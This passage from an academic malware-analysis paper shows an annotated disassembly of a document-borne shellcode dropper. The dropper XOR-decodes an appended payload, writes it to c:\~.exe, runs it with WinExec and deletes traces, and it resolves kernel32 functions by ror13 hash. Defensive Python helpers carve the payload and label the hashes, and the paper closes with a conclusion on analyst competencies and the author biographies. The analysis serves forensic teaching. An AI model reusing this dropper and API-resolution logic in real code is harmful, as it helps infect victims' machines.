seg000:00000CEA xor byte ptr [ebx], 81h ; the output file is xor'd with the static key 0x81

seg000:00000CED inc ebx

seg000:00000CEE dec eax

seg000:00000CEF cmp eax, 0

seg000:00000CF2 jnz short loc_CEA

seg000:00000CF4

seg000:00000CF4 ; At this point, the decoded payload exists on the heap. What to do with it?

seg000:00000CF4 ; Write it to disk of course! And use the last remaining unicode string as its

seg000:00000CF4 ; file name.

seg000:00000CF4

seg000:00000CF4 push 0

seg000:00000CF6 push 80h

seg000:00000CFB push 2

seg000:00000CFD push 0

seg000:00000CFF push 0

seg000:00000D01 push 40000000h

seg000:00000D06 push [edi+SCRATCH.String2] ; c:\~.exe

seg000:00000D09 call [edi+SCRATCH.pCreateFileW]

seg000:00000D0C mov [edi+SCRATCH.hFileTwo], eax

seg000:00000D0F push 0

seg000:00000D11 lea ebx, [edi+SCRATCH.endMarker]

seg000:00000D17 push ebx

seg000:00000D18 push [edi+SCRATCH.field_4]

seg000:00000D1B push [edi+SCRATCH.pMallocdBuff0]

seg000:00000D1E push eax

seg000:00000D1F call [edi+SCRATCH.pWriteFile]

seg000:00000D22 push 0

seg000:00000D24 lea ebx, [edi+SCRATCH.endMarker]

seg000:00000D2A push ebx

seg000:00000D2B push 0FFh

seg000:00000D30 push [edi+SCRATCH.szDOCFILENAME]

seg000:00000D33 push [edi+SCRATCH.hFileTwo]

seg000:00000D36 call [edi+SCRATCH.pWriteFile]

seg000:00000D39 push [edi+SCRATCH.hFileTwo]

seg000:00000D3C

seg000:00000D3C ; The code is cleaning up by closing its open file handles and releasing

seg000:00000D3C ; the heap back to the OS.

seg000:00000D3C

seg000:00000D3C call [edi+SCRATCH.pCloseHandle]

seg000:00000D3F push [edi+SCRATCH.pMallocdBuff0]

seg000:00000D42 call [edi+SCRATCH.pGlobalFree]

seg000:00000D45

seg000:00000D45 ; Here the code calls WinExec() to launch the new executable it has just

seg000:00000D45 ; written to disk. Then it deletes the copy of the original Word doc that

seg000:00000D45 ; it saved to c:\~$ and exits.

seg000:00000D45

seg000:00000D45 push 0

seg000:00000D47 push [edi+SCRATCH.String3] ; c:\~.exe

seg000:00000D4D call [edi+SCRATCH.pWinExec]

seg000:00000D50 push [edi+SCRATCH.String1] ; c:\~$

seg000:00000D53 call [edi+SCRATCH.pDeleteFileW]

seg000:00000D56 push 0

seg000:00000D58 call [edi+SCRATCH.pExitProcess]

seg000:00000D58 sub_B45 endp
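
For an analyst, the file handling in sub_B45 suggests a way to recover the dropped executable without running the sample. The Python sketch below assumes the layout implied by the listing: a little-endian dword length in the last four bytes of the document, the encoded payload immediately before it, and a single-byte XOR key of 0x81. The function and constant names are illustrative, and a real sample should be checked against this layout before the output is trusted.

```python
import struct

XOR_KEY = 0x81      # static key used by the loop at loc_CEA
TRAILER_SIZE = 4    # dword read from EOF-4 into field_4


def carve_payload(container: bytes, key: int = XOR_KEY) -> bytes:
    """Return the decoded payload appended to a carrier document.

    Assumed layout: [document][encoded payload][payload length, 4 bytes LE]
    """
    if len(container) < TRAILER_SIZE:
        raise ValueError("file is too small to hold the length trailer")

    # Step 1: read the payload length from the last four bytes.
    (length,) = struct.unpack("<I", container[-TRAILER_SIZE:])

    # Step 2: the payload starts (length + 4) bytes before EOF.
    end = len(container) - TRAILER_SIZE
    start = end - length
    if start < 0:
        raise ValueError("length trailer points before the start of the file")

    # Step 3: undo the single-byte XOR encoding.
    return bytes(b ^ key for b in container[start:end])
```

Calling carve_payload() on the raw bytes of a suspect document returns the decoded payload as bytes, which can then be hashed or loaded into a disassembler inside an isolated analysis environment.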

seg000:00000D58

seg000:00000D5B

seg000:00000D5B ; =============== S U B R O U T I N E =======================================

seg000:00000D5B

seg000:00000D5B ; Attributes: bp-based frame

seg000:00000D5B

seg000:00000D5B resolve_func proc near ; CODE XREF: sub_B45+6Ap

seg000:00000D5B ; sub_B45+7Ap ...

seg000:00000D5B

seg000:00000D5B arg_0 = dword ptr 8

seg000:00000D5B arg_4 = dword ptr 0Ch

seg000:00000D5B

seg000:00000D5B push ebp ; standard function prologue

seg000:00000D5C mov ebp, esp ; standard function prologue

seg000:00000D5E push edi ; save the scratch pad again

seg000:00000D5F mov edi, [ebp+arg_0] ; move arg[0] (name hash) into edi

seg000:00000D62 mov ebx, [ebp+arg_4] ; move arg[1] (kernel32 base) into ebx

seg000:00000D65 push esi

seg000:00000D66 mov esi, [ebx+3Ch] ; e_lfanew: offset of the PE header

seg000:00000D69 mov esi, [esi+ebx+78h] ; RVA of the export directory

seg000:00000D6D add esi, ebx ; convert the RVA to a pointer

seg000:00000D6F push esi ; save the export directory pointer

seg000:00000D70 mov esi, [esi+20h] ; RVA of the export name pointer table

seg000:00000D73 add esi, ebx

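seg000:00000D75 xor ecx, ecx

seg000:00000D77 dec ecx ; ecx = -1; incremented to 0 on the first pass

seg000:00000D78

seg000:00000D78 loc_D78: ; CODE XREF: resolve_func+36j

seg000:00000D78 inc ecx ; index of the export name being tested

seg000:00000D79 lodsd ; eax = RVA of the next export name

seg000:00000D7A add eax, ebx ; eax = pointer to the name string

seg000:00000D7C push esi

seg000:00000D7D xor esi, esi ; esi = running hash, starts at 0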

seg000:00000D7F

seg000:00000D7F loc_D7F: ; CODE XREF: resolve_func+31j

seg000:00000D7F movsx edx, byte ptr [eax] ; next character of the name

seg000:00000D82 cmp dh, dl ; for ASCII names, equal only at the terminating zero

seg000:00000D84 jz short loc_D8E

seg000:00000D86 ror esi, 0Dh ; rotate the hash right by 13 bits

seg000:00000D89 add esi, edx ; add the character

seg000:00000D8B inc eax

seg000:00000D8C jmp short loc_D7F

seg000:00000D8E ; ---------------------------------------------------------------------------

seg000:00000D8E

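seg000:00000D8E loc_D8E: ; CODE XREF: resolve_func+29j

seg000:00000D8E cmp edi, esi ; does the computed hash match the requested one?

seg000:00000D90 pop esi

seg000:00000D91 jnz short loc_D78 ; no - try the next export name

seg000:00000D93 pop edx ; edx = export directory pointer

seg000:00000D94 mov ebp, ebx ; ebp = module base

seg000:00000D96 mov ebx, [edx+24h] ; RVA of the ordinal table

seg000:00000D99 add ebx, ebp

seg000:00000D9B mov cx, [ebx+ecx*2] ; ordinal for the matching name

seg000:00000D9F mov ebx, [edx+1Ch] ; RVA of the export address table

seg000:00000DA2 add ebx, ebp

seg000:00000DA4 mov eax, [ebx+ecx*4] ; RVA of the function

seg000:00000DA7 add eax, ebp ; eax = address of the function

seg000:00000DA9 pop esi

seg000:00000DAA pop edi

seg000:00000DAB pop ebp

seg000:00000DAC retn 8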

seg000:00000DAC resolve_func endp
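
The hashing loop in resolve_func (rotate right by 13 bits, then add the next character) is easy to reproduce off-line, which lets an analyst label the pushed constants by hashing candidate export names. The Python sketch below mirrors that loop under the assumption that export names are plain ASCII, so the sign extension performed by movsx has no effect. The helper names ror32, ror13_hash and label_constants are illustrative.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by count bits."""
    count %= 32
    value &= 0xFFFFFFFF
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """Hash an ASCII export name the way the loop at loc_D7F does."""
    h = 0
    for byte in name.encode("ascii"):
        h = ror32(h, 13)               # ror esi, 0Dh
        h = (h + byte) & 0xFFFFFFFF    # add esi, edx
    return h


def label_constants(constants, candidate_names):
    """Map each hash constant to a matching candidate name, or None."""
    table = {ror13_hash(name): name for name in candidate_names}
    return {value: table.get(value) for value in constants}


if __name__ == "__main__":
    # Constants copied from the listing; candidate names are the analyst's guesses.
    pushed = [0x0E8AFE98, 0x99EC8974]
    guesses = ["WinExec", "CopyFileW", "CreateFileW"]
    for value, name in label_constants(pushed, guesses).items():
        print(f"{value:08X}h -> {name}")
```

For example, ror13_hash("WinExec") evaluates to 0E8AFE98h and ror13_hash("CopyFileW") to 99EC8974h, matching the constants pushed before the corresponding resolve_func calls. In practice the candidate list would be the full set of export names taken from a clean copy of kernel32.dll.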

seg000:00000DAC

seg000:00000DAF ; ---------------------------------------------------------------------------

seg000:00000DAF

seg000:00000DAF loc_DAF: ; CODE XREF: seg000:00000B40j

seg000:00000DAF call sub_B45

seg000:00000DAF ; ---------------------------------------------------------------------------

seg000:00000DB4 dd 0A2000h

seg000:00000DB8 aC:

seg000:00000DB8 unicode 0, <c:\~$>,0

seg000:00000DC4 aC_exe:

seg000:00000DC4 unicode 0, <c:\~.exe>,0

seg000:00000DD6 aC_exe_0 db 'c:\~.exe',0

seg000:00000DDF db 0Eh

seg000:00000DE0 db 0

seg000:00000DE1 db 0FFh

seg000:00000DE2 db 0FFh

seg000:00000DE3 db 0FFh

seg000:00000DE4 endp

7. CONCLUSION

Malware analysis is becoming an important field of specialization for forensic analysts. Authors of malware are increasingly profit driven and incorporate techniques to make their code as stealthy and undetectable as possible. Malware is being written by professional programmers who are very knowledgeable in their craft. They have a very good understanding of digital forensic methods and endeavor to make forensic analysis as difficult as possible.

The knowledge domain required to competently analyze malware is very broad. This paper has presented a brief introduction to a Malware Analysis Body of Knowledge that would be suitable for establishing a framework for competency development and assessment in the field of malware analysis, and for incorporation into academic curricula. A learning taxonomy is central to the malware analysis process, and eight domain areas were identified: malware, programming, anti-forensics, malware analysis, tools, legal and ethical considerations, environment, and collection.

Author Biography:

Mr. S. Murugan is working as ACTS Team Coordinator at CDAC, Bangalore. He received a BSc in Physics from Madurai Kamaraj University, Madurai, in 1989, an MCA degree in Computer Applications from Alagappa University, Karaikudi, Tamilnadu, India, and an MPhil (CS) from Manonmaniam Sundaranar University, Tirunelveli, Tamilnadu, India. He has 17 years of teaching and administrative experience at PG level in the field of Computer Science. He has published six papers in national conferences and two in international conferences. His research interests include Intelligence Network Security Algorithms and malware prevention and detection mechanisms and algorithms. He has published eight books and courseware in the field of Computer Science.

Dr. K. Kuppusamy is working as an Associate Professor in the Department of Computer Science and Engineering, Alagappa University, Karaikudi, Tamilnadu, India. He received his Ph.D. in Computer Science and Engineering from Alagappa University, Karaikudi, Tamilnadu, in 2007. He has published many papers in international and national journals and presented at national and international conferences. His research interests include Information/Network Security, Algorithms, Neural Networks, Fault Tolerant Computing, Software Engineering and Testing, and Operational Research.
